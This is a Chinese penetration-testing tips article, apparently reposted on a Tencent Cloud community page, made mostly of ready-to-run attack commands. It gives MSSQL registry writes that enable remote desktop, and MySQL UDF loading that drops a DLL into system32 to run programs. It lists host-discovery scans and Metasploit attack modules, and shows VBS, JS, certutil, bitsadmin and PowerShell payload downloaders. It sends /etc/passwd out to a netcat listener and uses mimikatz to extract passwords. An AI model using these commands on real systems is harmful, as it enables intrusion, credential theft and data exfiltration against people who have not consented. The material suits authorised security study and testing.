专栏首页鸿鹄实验室渗透测试的一些tips

渗透测试的一些tips

团队小伙伴学习亮神文章的笔记,希望对大家有所帮助...

1、windows快速查找exp

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799
KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904
KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i
"%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

需要可写目录....

2、mssql对于远程桌面的常见操作

查看

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\Terminal Server',
'fDenyTSConnections'

查看端口

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp',
'PortNumber'

开启

EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections','REG_DWORD',0;

3、交互的shell下mysql无法交互

使用-e进行解决

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE
 'c:\\windows\\system32\\xxxx.dll';"
mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

4、主机发现

udp:

msf > use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_sweep

arp:

msf > use auxiliary/scanner/discovery/arp_sweep

nmap -sn -PR 192.168.1.1/24

https://github.com/QbsuranAlang/arp-scan-windows-/tree/master/arp-scan
arp-scan.exe -t 192.168.1.1/24

netbios:

msf > use auxiliary/scanner/netbios/nbname

nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4

nbtscan-1.0.35.exe -m 192.168.1.0/24

snmp:

msf > use auxiliary/scanner/snmp/snmp_enum

nmap -sU --script snmp-brute 192.168.1.0/24 -T4

icmp:

for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1.%P | findstr "TTL ="

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4

D:\>tcping.exe ‐n 1 192.168.1.0 80

smb:

msf auxiliary(scanner/smb/smb_version) > show options

nmap ‐sU ‐sS ‐‐script smb‐enum‐shares.nse ‐p 445 192.168.1.119

for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445

1..5 | % { $a = $_; 445 | % {echo ((new‐object
Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open"}
2>$null}

msf:

auxiliary/scanner/discovery/arp_sweep 
auxiliary/scanner/discovery/udp_sweep
auxiliary/scanner/ftp/ftp_version 
auxiliary/scanner/http/http_version
auxiliary/scanner/smb/smb_version
auxiliary/scanner/ssh/ssh_version 
auxiliary/scanner/telnet/telnet_version
auxiliary/scanner/discovery/udp_probe 
auxiliary/scanner/dns/dns_amp
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/netbios/nbname 
auxiliary/scanner/http/title
auxiliary/scanner/db2/db2_version 
auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/tcp
auxiliary/scanner/portscan/syn 
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/xmas 
auxiliary/scanner/rdp/rdp_scanner
auxiliary/scanner/smtp/smtp_version
auxiliary/scanner/pop3/pop3_version
auxiliary/scanner/postgres/postgres_version 
auxiliary/scanner/ftp/anonymous
windows/gather/arp_scanner 
post/windows/gather/enum_ad_computers
post/windows/gather/enum_computers 
post/windows/gather/enum_domain
post/windows/gather/enum_domains 
post/windows/gather/enum_ad_user_comments

msf下的mysql攻击模块

1. auxiliary/scanner/mysql/mysql_login
2. exploit/multi/mysql/mysql_udf_payload
3. exploit/windows/mysql/mysql_mof
4. exploit/windows/mysql/scrutinizer_upload_exec
5. auxiliary/scanner/mysql/mysql_hashdump
6. auxiliary/admin/mysql/mysql_sql
7. auxiliary/scanner/mysql/mysql_version

msf下的mssql攻击模块

1. auxiliary/admin/mssql/mssql_enum
2. auxiliary/admin/mssql/mssql_enum_sql_logins
3. auxiliary/admin/mssql/mssql_escalate_dbowner
4. auxiliary/admin/mssql/mssql_exec
5. auxiliary/admin/mssql/mssql_sql
6. auxiliary/admin/mssql/mssql_sql_file
7. auxiliary/scanner/mssql/mssql_hashdump
8. auxiliary/scanner/mssql/mssql_login
9. auxiliary/scanner/mssql/mssql_ping
10. exploit/windows/mssql/mssql_payload
11. post/windows/manage/mssql_local_auth_bypass

5、payload下载

vbs:

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2 >>downfile.vbs

cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt
strFileURL = "http://192.168.1.115/robots.txt" 
strHDLocation = "c:\test\logo.txt" 
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") 
    objXMLHTTP.open "GET", strFileURL, false 
    objXMLHTTP.send() 
If objXMLHTTP.Status = 200 Then 
Set objADOStream = CreateObject("ADODB.Stream") 
    objADOStream.Open 
    objADOStream.Type = 1 
    objADOStream.Write objXMLHTTP.ResponseBody 
    objADOStream.Position = 0 
Set objFSO = CreateObject("Scripting.FileSystemObject") 
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on Set objFSO = Nothing 
objADOStream.SaveToFile strHDLocation 
objADOStream.Close 
Set objADOStream = Nothing 
End if 
Set objXMLHTTP = Nothing

certutil

certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt

certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete

bitsadmin

E:\>bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

js

读:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt

写:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;

BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt

powershell

$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\" 
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file) 
}
$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')

6、内网文件传输

root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d

7、密码提取

mimikatz_command -f sekurlsa::searchPasswords

mimikatz.exe "log Micropoor.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

8、portfwd转发

portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 渗透测试TIPS之Web(一)

    3、一个不错的OSINT工具框架网址:http://osintframework.com/

    Jumbo
  • 渗透测试与开发技巧

    https://github.com/3gstudent/Pentest-and-Development-Tips

    天钧
  • 渗透测试 | Tomcat渗透

    Tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP程序的...

    FB客服
  • 渗透测试入门 —— 渗透测试笔记

    本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,这两个 CMS 同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。

    小老鼠
  • 渗透测试

    渗透测试,也称为笔测试,是针对您的计算机系统的一个模拟网络攻击,用于检查可利用的漏洞。在Web应用程序安全性方面,渗透测试通常用于增强Web应用程序防火墙(WA...

    C4rpeDime
  • 渗透测试

    1.TCP flags标志(wireshark抓包tcp协议flags)

    sofu456
  • 渗透测试概述·什么是渗透测试

    渗透测试(penetration test,pentest)是实施安全评估(即审计)的具体手段。

    C4rpeDime
  • HackingLab的一套渗透测试题

     Hackinglab是一个在线网络信息安全攻防平台,里面有很多题,我随便做里面一套题,算是这两天学渗透的一个总结,题目地址

    mathor
  • 一次简单的渗透测试

    经过简单的测试,发现过滤了 ‘ and or like 等关键词。我使用了跟他意思相近的函数strcmp()函数进行绕过,去测试这个连接是否存在注入。可惜没有。

    天钧
  • 偶然的一次渗透测试

    本来,我是在看一篇科普文章的,做着提到了safe3这个漏扫工具,我就向想试一下这个工具如何,利用google hacking找了一个php的站,扫描完提示有可能...

    tnt阿信
  • 一次简单的渗透测试

    经过简单的测试,发现过滤了 ‘ and or like 等关键词。我使用了跟他意思相近的函数strcmp()函数进行绕过,去测试这个连接是否存在注入。可惜没有。

    7089bAt@PowerLi
  • 第一次被渗透测试

    最近一段时间在业余时间帮朋友做了个小型的信息管理系统,主要功能:用户用户登录、注册、信息维护、业务数据的增删改查,首页信息展示,模型关联关系等。麻雀虽小,但五脏...

    somenzz
  • 一次综合渗透测试

    一个月前的事了觉得挺有意思的记录一下。4月初回学校后不久想着不能荒废啊于是想去图书馆借本书学习一下。然而,可恶的是我想看的书图书馆竟然没搜到。可把我气坏了,好不...

    C4rpeDime
  • 渗透测试靶机Lampiao渗透WriteUp

    root@kali:~# nmap -n -v -Pn -p- -A --reason-oN nmap.txt 172.16.1.94

    墙角睡大觉
  • Linux渗透测试

    最近发现了一个不错的靶场,里面各种渗透测试的虚拟机,大家可以下载进行尝试学习。还有就是一个漏洞利用存档,可以找到很多我们可以利用的学习的东西。

    信安之路
  • SCADA渗透测试

    SCADA(Supervisory Control And Data Acquisition)即数据采集与监视控制系统。SCADA系统是以计算机为基础的DCS与...

    信安之路
  • web渗透测试

    用户6367961
  • FastJson渗透测试

    fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用...

    黑白天安全
  • 记一次有趣的渗透测试

    最近在做渗透测试的练习中遇到一个比较有意思的站点,在此记录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。

    信安之路

扫码关注云+社区

领取腾讯云代金券